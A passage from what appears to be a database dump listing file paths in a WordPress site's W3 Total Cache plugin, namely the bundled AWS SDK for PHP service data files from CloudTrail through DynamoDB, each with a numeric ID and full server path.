tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01/api-2.json.php'),(5728,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01/paginators-1.json.php'),(5729,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudtrail/2013-11-01/smoke.json.php'),(5730,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeartifact/2018-09-22/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeartifact/2018-09-22/api-2.json.php'),(5731,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeartifact/2018-09-22/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeartifact/2018-09-22/paginators-1.json.php'),(5732,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/api-2.json.php'),(5733,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/paginators-1.json.php'),(5734,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codebuild/2016-10-06/smoke.json.php'),(5735,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/api-2.json.php'),(5736,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/paginators-1.json.php'),(5737,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13/smoke.json.php'),(5738,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/api-2.json.php'),(5739,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/paginators-1.json.php'),(5740,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/smoke.json.php'),(5741,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/waiters-1.json.php'),(5742,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codedeploy/2014-10-06/waiters-2.json.php'),(5743,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguru-reviewer/2019-09-19/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguru-reviewer/2019-09-19/api-2.json.php'),(5744,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguru-reviewer/2019-09-19/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguru-reviewer/2019-09-19/paginators-1.json.php'),(5745,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguruprofiler/2019-07-18/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguruprofiler/2019-07-18/api-2.json.php'),(5746,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguruprofiler/2019-07-18/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codeguruprofiler/2019-07-18/paginators-1.json.php'),(5747,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/api-2.json.php'),(5748,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/paginators-1.json.php'),(5749,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09/smoke.json.php'),(5750,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/api-2.json.php'),(5751,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/paginators-1.json.php'),(5752,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19/smoke.json.php'),(5753,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-connections/2019-12-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-connections/2019-12-01/api-2.json.php'),(5754,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-connections/2019-12-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-connections/2019-12-01/paginators-1.json.php'),(5755,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-notifications/2019-10-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-notifications/2019-10-15/api-2.json.php'),(5756,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-notifications/2019-10-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/codestar-notifications/2019-10-15/paginators-1.json.php'),(5757,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-identity/2014-06-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-identity/2014-06-30/api-2.json.php'),(5758,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-identity/2014-06-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-identity/2014-06-30/paginators-1.json.php'),(5759,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-identity/2014-06-30/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-identity/2014-06-30/smoke.json.php'),(5760,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/api-2.json.php'),(5761,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/paginators-1.json.php'),(5762,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18/smoke.json.php'),(5763,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-sync/2014-06-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-sync/2014-06-30/api-2.json.php'),(5764,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-sync/2014-06-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-sync/2014-06-30/paginators-1.json.php'),(5765,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-sync/2014-06-30/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cognito-sync/2014-06-30/smoke.json.php'),(5766,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehend/2017-11-27/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehend/2017-11-27/api-2.json.php'),(5767,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehend/2017-11-27/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehend/2017-11-27/paginators-1.json.php'),(5768,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehendmedical/2018-10-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehendmedical/2018-10-30/api-2.json.php'),(5769,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehendmedical/2018-10-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/comprehendmedical/2018-10-30/paginators-1.json.php'),(5770,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/compute-optimizer/2019-11-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/compute-optimizer/2019-11-01/api-2.json.php'),(5771,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/compute-optimizer/2019-11-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/compute-optimizer/2019-11-01/paginators-1.json.php'),(5772,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/api-2.json.php'),(5773,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/paginators-1.json.php'),(5774,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/config/2014-11-12/smoke.json.php'),(5775,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect/2017-08-08/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect/2017-08-08/api-2.json.php'),(5776,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect/2017-08-08/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect/2017-08-08/paginators-1.json.php'),(5777,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect-contact-lens/2020-08-21/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect-contact-lens/2020-08-21/api-2.json.php'),(5778,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect-contact-lens/2020-08-21/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connect-contact-lens/2020-08-21/paginators-1.json.php'),(5779,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connectparticipant/2018-09-07/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connectparticipant/2018-09-07/api-2.json.php'),(5780,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connectparticipant/2018-09-07/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/connectparticipant/2018-09-07/paginators-1.json.php'),(5781,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/api-2.json.php'),(5782,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/paginators-1.json.php'),(5783,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cur/2017-01-06/smoke.json.php'),(5784,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/customer-profiles/2020-08-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/customer-profiles/2020-08-15/api-2.json.php'),(5785,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/customer-profiles/2020-08-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/customer-profiles/2020-08-15/paginators-1.json.php'),(5786,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/api-2.json.php'),(5787,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/paginators-1.json.php'),(5788,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/smoke.json.php'),(5789,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/databrew/2017-07-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/databrew/2017-07-25/api-2.json.php'),(5790,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/databrew/2017-07-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/databrew/2017-07-25/paginators-1.json.php'),(5791,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dataexchange/2017-07-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dataexchange/2017-07-25/api-2.json.php'),(5792,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dataexchange/2017-07-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dataexchange/2017-07-25/paginators-1.json.php'),(5793,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datapipeline/2012-10-29/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datapipeline/2012-10-29/api-2.json.php'),(5794,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datapipeline/2012-10-29/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datapipeline/2012-10-29/paginators-1.json.php'),(5795,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datasync/2018-11-09/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datasync/2018-11-09/api-2.json.php'),(5796,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datasync/2018-11-09/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datasync/2018-11-09/paginators-1.json.php'),(5797,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dax/2017-04-19/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dax/2017-04-19/api-2.json.php'),(5798,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dax/2017-04-19/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dax/2017-04-19/paginators-1.json.php'),(5799,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/detective/2018-10-26/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/detective/2018-10-26/api-2.json.php'),(5800,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/detective/2018-10-26/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/detective/2018-10-26/paginators-1.json.php'),(5801,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devicefarm/2015-06-23/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devicefarm/2015-06-23/api-2.json.php'),(5802,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devicefarm/2015-06-23/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devicefarm/2015-06-23/paginators-1.json.php'),(5803,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devicefarm/2015-06-23/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devicefarm/2015-06-23/smoke.json.php'),(5804,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devops-guru/2020-12-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devops-guru/2020-12-01/api-2.json.php'),(5805,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devops-guru/2020-12-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/devops-guru/2020-12-01/paginators-1.json.php'),(5806,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/directconnect/2012-10-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/directconnect/2012-10-25/api-2.json.php'),(5807,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/directconnect/2012-10-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/directconnect/2012-10-25/paginators-1.json.php'),(5808,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/directconnect/2012-10-25/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/directconnect/2012-10-25/smoke.json.php'),(5809,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01/api-2.json.php'),(5810,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01/paginators-1.json.php'),(5811,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01/smoke.json.php'),(5812,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dlm/2018-01-12/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dlm/2018-01-12/api-2.json.php'),(5813,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dlm/2018-01-12/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dlm/2018-01-12/paginators-1.json.php'),(5814,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/api-2.json.php'),(5815,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/paginators-1.json.php'),(5816,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/smoke.json.php'),(5817,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/waiters-2.json.php'),(5818,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/api-2.json.php'),(5819,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/paginators-1.json.php'),(5820,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/smoke.json.php'),(5821,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/waiters-2.json.php'),(5822,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/api-2.json.php'),(5823,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/paginators-1.json.php'),(5824,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/smoke.json.php'),(5825,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/api-2.json.php'),(5826,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/paginators-1.json.php'),(5827,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/smoke.json.php'),(5828,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/waiters-1.json.php'),(5829,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/waiters-2.json.php'),(5830,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/api-2.json.php'),(5831,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/paginators-1.json.php'),(5832,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/smoke.json